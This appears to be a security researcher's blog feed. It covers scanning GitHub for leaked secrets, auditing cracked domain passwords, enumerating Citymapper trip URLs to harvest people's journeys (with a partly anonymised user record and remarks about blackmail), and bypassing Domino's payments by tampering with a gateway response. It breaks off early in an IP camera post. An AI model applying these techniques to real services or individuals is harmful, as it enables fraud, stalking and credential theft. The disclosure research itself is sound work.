darkport urn:uuid:d1f020aa-74a6-4991-8597-97240b3e8729 2018-11-01T18:30:02Z
  • 17 Oct '19 Ahh shhgit!
    ... when you accidentally <code>git commit</code> secrets!
  • Ahh shhgit! 2019-10-17

    DevSecOps — the art of embedding security into the software development lifecycle — is a common and largely underestimated threat vector for many organisations. Software developers can accidentally leak sensitive information, particularly secret keys for third party services, across code hosting platforms such as GitHub, GitLab and BitBucket. These secrets — including the data they were protecting — end up in the hands of bad actors which ultimately leads to significant data breaches. Much like we saw with the Capital One data breach earlier this year, the Canadian banking giant Scotiabank screw-up, and the Uber 2016 data breach.

    <p>DevSecOps — the art of embedding security into the software development lifecycle — is a common and largely underestimated threat vector for many organisations. Software developers can accidentally leak sensitive information, particularly secret keys for third party services, across code hosting platforms such as GitHub, GitLab and BitBucket. These secrets — including the data they were protecting — end up in the hands of bad actors which ultimately leads to significant data breaches. Much like we saw with the <a target="_blank" href='https://nakedsecurity.sophos.com/2019/08/06/github-encourages-hacking-says-lawsuit-following-capital-one-breach/'>Capital One</a> data breach earlier this year, the Canadian banking giant <a href='https://www.theregister.co.uk/2019/09/18/scotiabank_code_github_leak/'>Scotiabank screw-up</a>, and the <a href='https://www.theregister.co.uk/2017/11/22/uber_2016_data_breach/'>Uber 2016</a> data breach.</p> <p>And finding these secrets across GitHub is nothing new. There are many open-source tools available to help with this depending on which side of the fence you sit. On the adversary side, popular tools such as <a href="https://github.com/michenriksen/gitrob" target="_blank">gitrob</a> and <a href="https://github.com/dxa4481/truffleHog">truggleHog</a> focus on digging in to commit history to find secret tokens from specific repositories, users or organisations. <a target="_blank" href='https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_04B-3_Meli_paper.pdf'>Recent research</a> from North Carolina State University found that many of the secrets accidentally committed to GitHub are cleaned up within 24 hours, rendering said tools rather ineffective in practice.</p> <p>On the defensive side, Amazon AWS labs have a tool called <a href="https://github.com/awslabs/git-secrets" target="_blank">git-secrets</a> that helps prevent committing secrets in the first place. And GitHub themselves are actively scanning for secrets through their <a href='https://help.github.com/en/articles/about-token-scanning'>token scanning</a> project. Their objective is to identify secret tokens within committed code in real-time and notify the provider who will automatically revoke the token to prevent any abuse. As of 15 October 2019, GitHub have on-boarded 15 providers:</p> <figure><table> <tbody> <tr><td>Alibaba Cloud</td><td>Amazon Web Services (AWS)</td><td>Atlassian</td></tr> <tr><td>Azure</td><td>Discord</td><td>Dropbox</td></tr><tr><td>GitHub</td><td>Google Cloud</td><td>Mailgun</td></tr><tr><td>npm</td><td>Proctorio</td><td>Pulumi</td></tr><tr><td>Slack</td><td>Stripe</td><td>Twilio</td></tr></tbody> </table></figure> <p>So in theory if you accidentally commit AWS secret keys to GitHub, Amazon will be notified and automatically revoke them. But how robust is this process? What if you could do the same but in an adversarial manner? Imagine being able to monitor the entirety of GitHub, GitLab and BitBucket to find any secrets accidentally committed <strong>in real time</strong>. Well, we're in luck. All three platforms provide a public &#39;real time firehose&#39; events API (albeit with a few minutes delay in practice), that details various activity streams on the site, including code commits.</p> <h2>Introducing shhgit!</h2> <p>Inspired by <a href="https://github.com/michenriksen/gitrob">gitrob</a>, my new tool <strong><a href='https://www.github.com/eth0izzle/shhgit' target="_blank">shhgit</a></strong> will watch this real-time stream and pull out any accidentally committed secrets. It works like this:</p> <p><img alt="image-20190904200221658(1)" src="/assets/img/shhgit-diagram.png"></p> <p>Pre-flight checks can be anything from ensuring the repository is below a particular size, has a certain number of stars, or isn&#39;t a fork. We then match the filename, path, extension, and the files contents against <a href='https://github.com/eth0izzle/shhgit/blob/master/config.yaml' target="_blank">120 signatures</a>. How does the tool fair in practice, you ask? Over a period of 48 hours I was able to identify the following secrets:</p> <figure><table> <thead> <tr><th>Secret Type</th><th>Count</th><th>Verified</th><th>Valid (%)</th></tr></thead> <tbody><tr><td>Username and Password in URI</td><td>1,351</td><td>440</td><td>32.5%</td></tr><tr><td>Amazon AWS</td><td>117</td><td>58</td><td>49%</td></tr><tr><td>Google OAuth keys</td><td>231</td><td>174</td><td>75.3%</td></tr><tr><td>MailGun API keys</td><td>194</td><td>87</td><td>44.8%</td></tr><tr><td>Slack Webhook URLs</td><td>139</td><td>62</td><td>44.6%</td></tr><tr><td>SQLite databases</td><td>33</td><td>-*</td></tr><tr><td><em>-- redacted for brevity</em> </td></tr></tbody> </table></figure> <p><em>* indicates no verification took place</em></p> <p>And a fuck-ton of sensitive client data. On average, I was finding and verifying secrets within 7 minutes of them being committed. And as you can see from the verified column, around 50% of them were valid meaning I could access the respective service using the captured credentials/keys. This suggests that either GitHub&#39;s token scanning isn&#39;t quick enough or their patterns aren&#39;t matching everything. I suspect it&#39;s a bit of both.</p> <p><em>And note: I am purely validating secrets in an immutable way. No data was accessed.</em></p> <p>To bring this threat to life I wrapped up shhgit in a <a href="https://shhgit.darkport.co.uk" target="_blank">web front-end</a>. Watching the screen through secret after secret is quite mesmerising!</p> <p><a href="https://shhgit.darkport.co.uk" target="_blank"><img src="/assets/img/shhgit-live-example.png" class="original" /></a></p> <h2>An unexpected finding...</h2> <p>What I wasn&#39;t expecting to find was valid package manager API keys, i.e., npm for Node.js; PyPi for Python; and NuGet for C#. The total number of downloads for these packages is in the <strong>millions</strong>. And the majority of these keys had publishing permissions. Meaning a bad actor could theoretically embed malicious code into the packages, reupload them without detection, and potentially infect millions of devices. These are just some redacted keys for <a href='https://www.nuget.org/' target="_blank">NuGet</a> packages:</p> <p><img alt="shhgit-package-manager-keys" src="/assets/img/shhgit-package-manager-keys.png"></p> <h2>Na na na na Na na na na GITMAN!</h2> <p>If you scroll back up to our table, you&#39;ll note that &quot;Username and Password in URI&quot; is by-far the most common found type of secret, i.e.: <em>scheme://username:password@hostname:port</em>. And the majority of these are databases, e.g., PostgreSQL, MongoDB, MySQL, etc. Because of the standardised URI format we can easily and automatically verify the credentials for popular schemes:</p> <p><img alt="image-20191015233505462" src="/assets/img/shhgit-uri-code.png"></p> <p>And if the connection is successful — and because we're a Good Samaritan — we can automatically raise an issue with the code maintainers on the platform the secret was found. </p> <figure><table> <tbody><tr><td><img alt="image-20191015234016327" class="original" src="/assets/img/shhgit-issues.png"></td><td style='text-align:left;' ><img alt="image-20191015234317590" class="original" src="/assets/img/shhgit-issue.png"></td></tr></tbody> </table></figure> <h2>So what?</h2> <p>As I mentioned at the beginning of my post, leaking secrets across public code repositories is not a new threat. It's existed since the launch of GitHub and other services over 10 years ago. And from the recent data breaches the implications are clear: reputational damage and huge fines. But we — software developers, team managers, organisations — should be doing more:</p> <ol> <li>Ensure secrets don't end up in your code base in the first place. They should be a part of your environment. At a minimum, config files should be encrypted with a environment-based key. The Travis CI docs have a <a href="https://docs.travis-ci.com/user/best-practices-security/" target="_blank">great guide on this</a>.</li> <li>Use automated tools such as <a href="https://github.com/awslabs/git-secrets" target="_blank">git-secrets</a> to prevent secrets being committed.</li> <li>Provide training - and equally take the initiative to seek out training — on best practices and secure coding standards and guidelines.</li> <li>Make sure you are across your vendors who are developing code or apps for you. Ignorance isn't good enough. Ask the right questions.</li> </ol> <p>And hopefully you won't be exclaiming <strong>ahh shhgit!</strong>.</p> <p>&nbsp;</p>
    Paul Price paul@darkport.co.uk
  • 1 Nov '18 Effortless Password Audits
    Why you should be auditing your users passwords.
  • Effortless Password Audits 2018-11-01

    Passwords. They are the keys to our digital kingdoms. And these days most organisations will have security controls in place, such as 2 Factor Authentication, to complement the traditional password and help prevent credential stuffing attacks. (sidenote: did you know that 2FA deployed on your Exchange server can be effortlessly bypassed?)

    <p><strong>Passwords</strong>. They are the keys to our digital kingdoms. And these days most organisations will have security controls in place, such as 2 Factor Authentication, to complement the traditional password and help prevent credential stuffing attacks. <em>(sidenote: did you know that 2FA deployed on your Exchange server can be effortlessly bypassed?)</em></p> <p>But that doesn't mean we can lax the rules around passwords. They still play a huge part in protecting our data. According to the <a href="http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/" rel="noopener" target="_blank">Verizon 2017 Data Breach Investigations Report</a> 81% of hacking-related data breaches involve leveraging stolen and/or weak passwords.</p> <p>And yet I see time and time again organisations enabling "complex" password composition rules and be done with it. But these rules don't go far enough. Passwords such as <em>Passw0rd</em>, <em>London18</em> and <em>Qwerty123</em> would meet most organisations complexity requirements, and would be amongst the first attempted in a brute-force attack. When conducting security audits I still regularly see passwords containing the company name or office address, i.e.<em>Acme2018</em> or <em>17StationRoad</em>.</p> <p>This is why you should be auditing your passwords. They can provide invaluable insight into understanding the security awareness levels of your staff. A large number of users with weak and predictable passwords can suggest cultural issues, inadequate training, and even identify staff with low levels of engagement — something you can begin to fix.</p> <h1>Effortless Audits</h1> <p>The cracking process of a password audit is always going to be the largest limiting factor in terms of time. You don't need to crack <strong>all</strong> passwords - just the weak ones - and sometimes cracking on your local machine is sufficient enough. For larger organisations, it's easy enough to spin up an Amazon's AWS GPU instance. The <em>p2.16xlarge</em> with 16 GPUs, for example, can work through 130702 MILLION PASSWORDS PER SECOND. Even then it can take a few days to crack upwards of 90%.</p> <p>You then need to analyse the passwords and determine if they are <em style="color:green;">good</em> or <em style="color:red;">bad</em>. And who wants to manually analyse 1000s of passwords, pick out interesting statistics and create various reports?</p> <p>To make this process less painful, <a href="https://github.com/eth0izzle/cracke-dit" rel="noopener" target="_blank">I have developed a tool called cracke-dit (“Cracked It”)</a> – free and open-source for all – that directly extracts passwords from a Windows Domain Controller, analyse them, and output the data in various different formats. For example, you can produce a password cloud in seconds:</p> <p><img src="/assets/img/password_cloud.png" alt="Passwords for acme.local\" class="size-big"></p> <p><em>A sample output of cracke-dit can be found at the <a href="#sample-output">bottom of this post</a>.</em></p> <p>Passwords are scored based on complexity using <a href="https://github.com/dropbox/zxcvbn" rel="noopener" target="_blank">Dropbox's zxcvbn</a> algorithm, where 0 is a bad password and 4 is a good password. To get an idea on how unique users passwords are, they are also checked against <a href="https://haveibeenpwned.com/" rel="noopener" target="_blank">Have I Been Pwned</a>, using <a href="https://blog.cloudflare.com/validating-leaked-passwords-with-k-anonymity/">k-Anonymity</a> to ensure passwords are kept secure.</p> <p>You can then begin to develop training programmes to improve your staff's password hygiene and general security awareness.</p> <h1>Securing Passwords</h1> <p>One of the golden rules I've learned from my programming background is to <strong>never trust user input</strong>. The same applies to passwords and you should plan for them to be compromised at some point. Here are 5 things you should be doing: </p> <ol> <li>Ensure wherever a password is used externally, it has adequate security controls in place such as rate limiting and 2 Factor Authentication. Take into account other factors such as login time, geographical location, and IP address and deny login attempts if it falls outside of the user's usual pattern.</li> <li>Teach your users <strong>what a good password looks like</strong> (hint: a long pass<em>phrase</em>). Why is it important? Show examples of good and bad passwords. Make sure this advice is embedded within your induction programme for new joiners.</li> <li>Gradually increase the minimum password length requirement to a minimum of 10, ideally 12, characters. Longer passwords increase entropy, which means they are (generally) more secure. Consider rolling out a password manager and adequate training to help with this.</li> <li>Audit passwords monthly (or at least quarterly) to identify training needs for users who are still struggling to create strong passwords. Reward staff who are creating better passwords.</li> <li>Stop forcing users to reset their password every X days. Yes, it reduces risk but at <a href="https://www.sans.org/security-awareness-training/blog/why-90-day-rule-password-changing">great cost</a>. Research suggests this leads to users creating weaker passwords over time. Only force users to reset passwords if you believe they <a href="https://haveibeenpwned.com/">have been compromised</a>.</li> </ol> <hr id="sample-output"><p class="notification is-link has-text-centered">I've also created a platform called <a href="https://www.passlo.com/" target="_blank" class="has-text-weight-bold">Passlo</a> to fully automate your password audits, enabling you to understand and reduce your risk.</p> <h1>cracke-dit sample output</h1> <p><code style="font-size:14px;">cracke-dit report for acme.local</code></p><code style="font-size:14px;"> <p>Local / Domain users: 4/191<br> Enabled / disabled users: 186/9<br> Computer accounts: 2 1.02%<br> Passwords cracked: 84/197 42.64%<br> Historic passwords: 0 0.00%</p> <p>Password composition<br> Only alphanumeric: 69 35.03%<br> Only digits: 0 0.00%<br> With 'special char': 15 7.61%</p> <table> <tbody><tr> <th colspan="6">Top 10 Passwords (by use, score)</th> </tr> <tr> <th>Password</th> <th>Length</th> <th>Count</th> <th>Score</th> <th>Pwned</th> <th>Users</th> </tr> <tr> <td>Porsche2016</td> <td>11</td> <td>2</td> <td>1</td> <td>1</td> <td>acme.local\alika.reamy, acme.local\charlene.pietro</td> </tr> <tr> <td>Bollocks35</td> <td>10</td> <td>2</td> <td>1</td> <td>0</td> <td>acme.local\eden.theobald, acme.local\tami.priscella</td> </tr> <tr> <td>Amanda175</td> <td>9</td> <td>2</td> <td>0</td> <td>0</td> <td>acme.local\bernelle.farman, acme.local\lanna.menken</td> </tr> <tr> <td>Rasputin2016</td> <td>12</td> <td>1</td> <td>2</td> <td>0</td> <td>acme.local\colline.davon</td> </tr> <tr> <td>Dragoon2016</td> <td>11</td> <td>1</td> <td>2</td> <td>0</td> <td>acme.local\kattie.duff</td> </tr> <tr> <td>Prophet2016</td> <td>11</td> <td>1</td> <td>2</td> <td>0</td> <td>acme.local\sharia.ramey</td> </tr> <tr> <td>Bounce2016</td> <td>10</td> <td>1</td> <td>2</td> <td>0</td> <td>acme.local\lauretta.cyn</td> </tr> <tr> <td>Groove2016</td> <td>10</td> <td>1</td> <td>2</td> <td>2</td> <td>acme.local\shena.fernas</td> </tr> <tr> <td>Passwords2016</td> <td>13</td> <td>1</td> <td>1</td> <td>0</td> <td>acme.local\cheslie.codd</td> </tr> <tr> <td>Godzilla2016</td> <td>12</td> <td>1</td> <td>1</td> <td>0</td> <td>acme.local\lenna.mun</td> </tr> </tbody></table> <table> <tbody><tr> <th colspan="6">Top 10 Worst Passwords (by score, length)</th> </tr> <tr> <th>Password</th> <th>Length</th> <th>Count</th> <th>Score</th> <th>Pwned</th> <th>Users</th> </tr> <tr> <td>Admiral!</td> <td>8</td> <td>1</td> <td>0</td> <td>4</td> <td>acme.local\kimberlyn.wilmott</td> </tr> <tr> <td>Beavis24</td> <td>8</td> <td>1</td> <td>0</td> <td>8</td> <td>acme.local\leoine.kristi</td> </tr> <tr> <td>Bigmac44</td> <td>8</td> <td>1</td> <td>0</td> <td>8</td> <td>acme.local\denna.bartel</td> </tr> <tr> <td>Briana48</td> <td>8</td> <td>1</td> <td>0</td> <td>0</td> <td>acme.local\evangelin.adeline</td> </tr> <tr> <td>Casino45</td> <td>8</td> <td>1</td> <td>0</td> <td>13</td> <td>acme.local\beverley.donaldson</td> </tr> <tr> <td>Chipper!</td> <td>8</td> <td>1</td> <td>0</td> <td>3</td> <td>acme.local\janella.popelka</td> </tr> <tr> <td>College!</td> <td>8</td> <td>1</td> <td>0</td> <td>39</td> <td>acme.local\minny.kinghorn</td> </tr> <tr> <td>Connie23!</td> <td>8</td> <td>1</td> <td>0</td> <td>11</td> <td>acme.local\glynda.geller</td> </tr> <tr> <td>Daniel96</td> <td>8</td> <td>1</td> <td>0</td> <td>343</td> <td>acme.local\marlie.maurilla</td> </tr> <tr> <td>Ddddddd6</td> <td>8</td> <td>1</td> <td>0</td> <td>6</td> <td>acme.local\lanita.marte</td> </tr> </tbody></table> </code><p><code style="font-size:14px;">Password length distribution<br> 8: ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇ 32 (16.24%)<br> 9: ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇ 25 (12.69%)<br> 10: ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇ 15 (7.61%)<br> 11: ▇▇▇▇▇▇▇ 7 (3.55%)<br> 12: ▇▇▇▇ 4 (2.03%)<br> 13: ▇ 1 (0.51%)<br> </code></p>
    Paul Price paul@darkport.co.uk
  • 13 Feb '18 Online Stalking: London, Paris, New York
    Abusing seemingly innocent data.
  • Online Stalking: London, Paris, New York 2018-02-13

    Much like the Strava controversy a few weeks ago, this is a great example of how seemingly innocent data can be used for nefarious purposes.

    <p><em>Much like the Strava controversy a few weeks ago, this is a great example of how seemingly innocent data can be used for nefarious purposes.</em></p> <p>Citymapper is a journey planning application that integrates all modes of transport (public, cycling, walking, driving) in major urban areas. Starting in London, Citymapper is now available in New York, Paris and Amsterdam as well as further afield (as you’ll see shortly).</p> <p>Citymapper hasn’t disclosed the number of users it has. The Google Play store states between 5-10million downloads; assume the same, if not higher, for Apple’s App Store. Remember that it is only available in major cities and you can see that a large percentage of the world’s capital cities use this application.</p> <p>On a personal note, Citymapper is a ‘must-have’ app for anybody living in London, especially for a non-local. Citymapper’s ability to respond to train non-availability, cancellations and tube strikes whilst still delivering a live and accurate route recommendation has certainly saved a few people caught in the rain or running late for job interviews.</p> <p><strong>So, what kind of data does Citymapper have?</strong></p> <p>On any given day, in cities around the world, they know the exact routes of millions of people; they know where people are travelling, when, and even what modes of transport they are taking.</p> <p>This information would be hugely useful and have huge applications for any organisation that operates in one of the world’s major cities… it could also be used maliciously should any of this data be publicly facing.</p> <p>In October 2015, Citymapper rolled out an update that allowed it’s users to share routes and arrival times with their friends. Even friends that don’t have the application can view the trip as it all works through the web browser. Each time a trip is planned on Citymapper a URL is generated that allows your friends to view your trip on a web page. Below is an example.</p> <p><img src="/assets/img/citymapper_1.jpg" alt=""></p> <p>As you can see there isn’t anything hugely compromising and no personal identifiable information is available. You have a start location, an end location, a route and some timing information. In this instance, a random inhabitant of London travelled from Tooting to Balham on the Northern Line before getting an Overground train to Battersea, all in all taking 26 minutes.</p> <p>The eagle-eyed amongst you might see where this is going.</p> <p>The URL (<a href="https://citymapper.com/trip/Tbs6odu">https://citymapper.com/trip/Tbs6odu</a>) has a fairly short unique identifier. “Tbs6odu”, 7 characters long with uppercase, lowercase and numeric characters.</p> <p>By way of comparison, most online sharefile programs that generate random URLs often have upwards of 20 characters; inclusive of uppercase, lowercase, numbers and special characters (Aj5ye&amp;hsk8Pq@3Hh%#3Q), which is exponentially harder to brute force.</p> <p>Using a Python script to generate alphanumerical codes 7 characters in length, and check if they are valid by firing an HTTP request to Citymapper was initially sluggish. Even though it is a comparatively short URL ID there are still ~3 x 10<sup>12</sup> combinations to get through – slow progress if you need to remain below the threshold of Citymapper’s rate limiter. In an hour I had discovered less than 10 valid URLs.</p> <p>However, there was a pattern!</p> <ul> <li>T4v8muk</li> <li>Tgg5743</li> <li>Tbiwmq9</li> <li>Tha7v1o</li> <li>Tjrdjfp</li> <li>Tdgv2zj</li> <li>Tjgddh3</li> <li>Twdwck3</li> </ul> <p>Each of the URLs began with a capital ‘T’ and used no uppercase letters after the first character. Mathematically, this reduces the number of possible URL combinations from ~3 x 10<sup>12</sup> to ~2 x 10<sup>9</sup>.</p> <p>A few tweaks to the Python script and it was possible to harvest over 35,000 valid URLs in just a few hours.</p> <p>Whilst it was quite fun to browse to each trip individually, and see what the people of the world were up to, I decided to try and visualise all this data. With our list of valid URLs, it was then possible to use API requests to harvest the information available for each of the 35,000 trips.</p> <p>Each API returned (broadly!) followed the following:</p> <pre><code>{'status': 'arrived', 'last_updated': '2016-09-15T10:13:09.126014+00:00', 'region_id': 'uk-london', 'endaddress': '', 'endname': '', 'message': '', 'share_type': 'eta', 'title': None, 'eta': '2016-09-15T10:13:00+00:00', 'startname': '', 'signature': '{"duration": 544, "end": {"address": "Tudor Stacks, 1 Dorchester Dr, Herne Hill, London SE24 0DL, UK", "coords": "51.458745,-0.096573", "id": "google:ChIJhzq09XYEdkgRnJYjDWZtzsA", "name": "Tudor Stacks, 1 Dorchester Dr, Herne Hill, London SE24 0DL, UK", "source": "3"}, "kind": "cycle_personal/fastest", "legs": [{"distance": 1694, "duration": 544, "ec": "51.458573,-0.096713", "mode": "cycle", "sc": "51.468142,-0.095144"}], "region": "uk-london", "start": {"address": "Bessemer Road", "coords": "51.468135,-0.095137", "source": "1"}, "time": "2016-09-15T11:01:44+01:00/NOWISH", "version": 2}', 'startaddress': '', 'coords': [51.458855, -0.096722]} </code></pre> <p>As you can see below it is possible to harvest, en masse, starts and ends to journeys, addresses, methods of transportation and lat/long coordinates.</p> <p>Plotting all the lat/long coordinates into generates the following maps.</p> <p>(To any non-GIS aficionados, the easiest way I found to accomplish this was using Google Fusion tables – a tutorial can be found here <a href="https://support.google.com/fusiontables/answer/2571232">https://support.google.com/fusiontables/answer/2571232</a>).</p> <p>The World:</p> <p><img src="/assets/img/citymapper_2.jpg" alt=""></p> <p>London:</p> <p><img src="/assets/img/citymapper_3.png" alt=""></p> <p>However, not all API returns were created equally. Out of the ~35,000 API returns there were: <strong>1,706 usernames, 3,623 locations that were tagged as ‘home’ and 1,009 locations were tagged as ‘work’</strong>. Combined with some OSINT research we can start to attribute trips to ‘real people’. Take the following API response <em>(anonymised with x’s where appropriate)</em>:</p> <pre><code>{'status': 'expired', 'last_updated': '2017-04-04T19:33:55+00:00', 'region_id': 'uk-london', 'endaddress': '', 'endname': '', 'message': '', 'share_type': 'eta', 'title': None, 'eta': '2017-04-04T20:27:00+00:00', 'startname': '', 'signature': '{"car": 18701, "duration": 3759, "end": {"address": "XXXXX, XXXXX, London E17 XXX, UK", "coords": "51.5XXXX,-0.0XXXXX", "name": "Home", "source": "5"}, "legs": [{"distance": 391, "duration": 346, "ec": "51.4XXXX,-0.1XXXX", "in_station": "0/60", "mode": "walk", "sc": "51.XXXXX,-0.1XXXXX"}, {"end": "Victoria", "mode": "transit", "route_ids": ["NationalRailSN"], "start": "BatterseaPark", "stop_count": 2, "stop_ids": ["Platform_BatterseaPark_NationalRail", "Platform_Victoria_BGeS"]}, {"distance": 0, "duration": 330, "ec": "51.4XXXX,-0.1XXXXX", "in_station": "1/330", "mode": "walk", "sc": "51.4XXXXX,-0.1XXXXX"}, {"end": "WalthamstowCentral", "mode": "transit", "route_ids": ["Victoria"], "start": "Victoria", "stop_count": 12, "stop_ids": ["Platform_Victoria_V_dN", "Platform_WalthamstowCentral_Underground"]}, {"distance": 1349, "duration": 1205, "ec": "51.5XXXXX,-0.0XXXXX", "from_exit": "WalthamstowCentral_E2903", "in_station": "2/120", "mode": "walk", "sc": "51.5XXXX,-0.0XXXXX4"}], "price_pence": 390, "region": "uk-london", "routing_request_id": "02ffc71d-daa5-4828-bea3-a31adf3c3c6e", "start": {"coords": "51.4XXXXX,-0.1XXXX", "source": "1"}, "time": "2017-04-04T20:29:04+01:00/NOWISH", "version": 2}', 'startaddress': '', 'coords': [51.4XXXX, -0.1XXXX], 'user_name': 'Chris'} </code></pre> <p>As you can see, on 04 Apr 2017, Chris took a journey at 19:33 from Battersea to his home address in E17. He walked to Victoria station before taking the Victoria line to Walthamstow.</p> <p><img src="/assets/img/citymapper_4.jpg" alt=""></p> <p>With a bit of help from electoral records and social media we can attribute Chris to an actual human being… with actual friends and an actual job.</p> <p><img src="/assets/img/citymapper_5.jpg" alt=""></p> <p>Arguably this journey in isolation isn’t very useful to anybody, malicious or otherwise. If I ran my Python script for a month however, there would probably be enough data to start building a pattern of life for Chris (depending on how often he uses the application). This is especially pertinent as some of the journeys that I harvested were dated from over 2 years ago. However, I couldn’t confirm whether every journey ever made on Citymapper was available with such a small dataset.</p> <p>What is interesting though is that if you take an ‘end location’ and work backwards you can see which individuals have been to certain locations.</p> <p>In my dataset there were 5 instances of journeys planned to visit the Eiffel Tower in Paris; the 5 people had made their way there from shopping, bars, or hotels. Not surprising.</p> <p><img src="/assets/img/citymapper_6.jpg" alt=""></p> <p>But what if we look at somewhere less reputable; such as Amsterdam’s red light district;</p> <p><img src="/assets/img/citymapper_7.png" alt=""></p> <p>We can see that a handful of people may be unaware that their trips are publicly available. If we used OSINT to research these trips and people, might we find a happily married man to blackmail?</p> <p>Would Oscar’s employers be happy to know that he was taking a trip home at 04:03 on a Wednesday morning?</p> <p><img src="/assets/img/citymapper_8.jpg" alt=""></p> <h2 id="thefix">The Fix</h2> <p>I wouldn’t classify this a bug or a security flaw, per se, but there is more Citymapper can do to prevent these types of attacks from being used in the wild:</p> <ol> <li>To protect future URLs increase the ID complexity either by increasing the length or including uppercase and special characters. </li> <li>Audit your historical trips and remove the links to trips over a few days old, there would be no reason for the link to remain after a trip is complete. </li> <li>Remove first names or home labels from publicly facing API</li> </ol> <h2 id="disclosure">Disclosure</h2> <p>We e-mailed Citymapper’s operations team to raise the issue and their engineering team promptly responded and fixed the issue within a week – thank you Citymapper!</p> <ul> <li>7th November ’17 — Research conducted</li> <li>9th November ’17 — Vendor notified</li> <li>16th November ’17 — Citymapper pushes out a patch, rendering this attack infeasible – seeking solutions to existing URLs and confidentiality issues.</li> <li>13th February ’18 — Article published</li> </ul>
    Daniel Faram paul@darkport.co.uk
  • 4 Apr '16 Domino's: Pizza and Payments
    pizza.free = true
  • Domino's: Pizza and Payments 2016-04-04
    <p class="notification is-darker"><strong>Note</strong>: Domino's have since resolved the issue and is one of the reasons why I've decided to post this article. Payments are still being processed client side but they now have the proper server side checks in place.</p><p>Friday evening, circa 3 years ago. I'm craving an Americano with extra pineapple and hot dog stuffed crust. I fire up the Domino's Android app, place my order and 40 minutes later I'm stuffing my face with 13.5" goodness.</p> <p>I've ordered enough pizza to know that at the end of the order process you sometimes, seemingly randomly, get a £10 off voucher code for your next order. Naturally, I was intrigued to how this was generated.</p> <p>After sifting through the apps source code I notice that the code is generated server side via an API call. I fire up a proxy (Burp) to monitor the web traffic between my phone and the Domino's API server and run through the order process. Something immediately catches my eye...</p> <p><strong>The Domino's app <em>itself</em> was processing payments client side via a payment gateway.</strong></p> <p>This isn't inherently bad if it has been correctly implemented with the appropriate server side checks. Usually payments would be processed server side so that the process is hidden and out of the hands of meddling users.</p> <p>So let's take a closer look. I place a new order with the VISA debit card test number (<em>4111111111111111</em>) which returns the following response from DataCash (the payment gateway):</p> <pre><code>&lt;Response&gt; &lt;CardTxn&gt; &lt;authcode&gt;NOT AUTHORISED&lt;/authcode&gt; &lt;card_scheme&gt;VISA&lt;/card_scheme&gt; &lt;/CardTxn&gt; &lt;datacash_reference&gt;3340105259009953&lt;/datacash_reference&gt; &lt;merchantreference&gt;3340105259009953&lt;/merchantreference&gt; &lt;mode&gt;LIVE&lt;/mode&gt; &lt;reason&gt;DECLINED&lt;/reason&gt; &lt;status&gt;7&lt;/status&gt; &lt;time&gt;1449024000&lt;/time&gt; &lt;/Response&gt; </code></pre> <p>As expected the card is declined and the App shows an error message. Let's try our luck by intercepting the response and changing some values around. I start a new order and set breakpoints on the HTTP endpoint for the DataCash API. Once the breakpoint triggers on the response, I change the <code>&lt;reason&gt;</code> attribute value to <em>ACCEPTED</em> and <code>&lt;status&gt;</code> to <em>1</em> (which means transaction accepted according to the <a href="https://testserver.datacash.com/software/download.cgi">DataCash documentation</a>).</p> <p><img src="/assets/img/dominos_1.png" alt="Order Placed"></p> <p><strong>Errr, what?</strong> It looks like my order was placed without a valid payment. Surely this is an oversight/edge case and Dominos's will have back office checks in place before physically starting to prepare my order... right?</p> <p>A few minutes pass and the Pizza Tracker changes from "Order" to "Prep" and then to "Baking". I couldn't bear to wait another 30 minutes to see if an Americano pizza, Chicken Strippers and Chocolate Chip Cookie + Ice Cream side turn up at my door. I called the store and they confirm they have received my order and it will be delivered within the next 20 minutes. My first thought: <strong>awesome</strong>. My second thought: <strong>shit</strong>.</p> <p>The pizza arrives and I tell the delivery driver there must have been a mistake with the order as I never entered any card details and wanted to pay with cash. He happily leaves with £26 and my conscience is clean.</p> <p>Let's take a look at what happened. Essentially the App's logic boils down to <em>(pseudocode)</em>:</p> <pre><code>if (datacash.response.reason == 'ACCEPTED' &amp;&amp; datacash.response.status == 1) placeOrder(); </pre></code> <p>Where <code>placeOrder()</code> sends an HTTP request to the Domino's API with the <code>order_id</code> (generated when you start your order) and <code>&lt;merchantreference&gt;</code> (in the above XML response). All Dominos needed to do was verify the reference server side. But no, let's trust the client. The client <em>never</em> lies.</p> <p>Payments aside, the moral of the story is to always validate your inputs server side. <strong>Always</strong>.</p><p class="notification is-link"><strong>Sidenote</strong>: I've had a few questions as to why anyone would process payments client side. Seems ridiculous, right? There are genuine reasons to do so, mainly it drastically reduces risk and removes your responsibility handling credit card data, i.e you don't have to go through PCI DSS compliance thus reducing your implementation costs.</p>
    Paul Price paul@darkport.co.uk
  • 30 Jan '15 Owning Philips In.Sight IP Cameras
    Poppin' root shells on Internet-enabled cameras.
  • Owning Philips In.Sight IP Cameras 2015-01-30

    This is a continuation from my previous post but this time we'll be taking a look at the device itself, the Philips In.Sight M100. The end goal is to pop a root shell on the device which we successfully accomplish by exploiting mutiple vulnerabilities.

    <p>This is a continuation from my <a href="http://www.ifc0nfig.com/yoics-account-takeover-vulnerability">previous post</a> but this time we'll be taking a look at the device itself, the <a href="http://www.philips.co.uk/c-p/M100_05/wireless-home-monitor">Philips In.Sight M100</a>. The end goal is to pop a root shell on the device which we successfully accomplish by exploiting mutiple vulnerabilities.</p> <h3 id="abitofrr">A bit of R&amp;R</h3> <p>Let's start with the basics. After a little bit of Google-foo we find the camera is based on the Maxim MG3500 board. The <a href="http://www.mds.com/system/resources/BAhbBlsHOgZmIj0yMDExLzAzLzA4LzA5LzIzLzU2LzQxNy9tZzM1MDBfZXZwMl9kYXRhX3NoZWV0X3JldjJiLnBkZg/">data sheet</a> reveals it has a ARM9 processor and runs Linux. From a software perspective it mentions an embedded web server, RTP streaming, based of the 2.6.20 kernel, runs busybox and has LUA built in. There's even talk of a toolchain which may come in handy later on.</p> <p>To get the camera connected to the network you have to use the setup wizard in the <a href="https://play.google.com/store/apps/details?id=com.philips.cl.insight">Android</a> or <a href="https://itunes.apple.com/gb/app/philips-in.sight-m100-b120/id506640760">iOS</a> app. You are asked for your WiFi password which is then encoded in to a QR code for your camera to read so it can connect:</p> <pre><code class="language-bash">WIFI:T:WPAPSK2_AES;S:SSID;P:KEY;;12:1:;IP:;PID:2000;TZ:GMT+0:00##+ </code></pre> <p>After a few seconds the camera flashes green to notify you it's 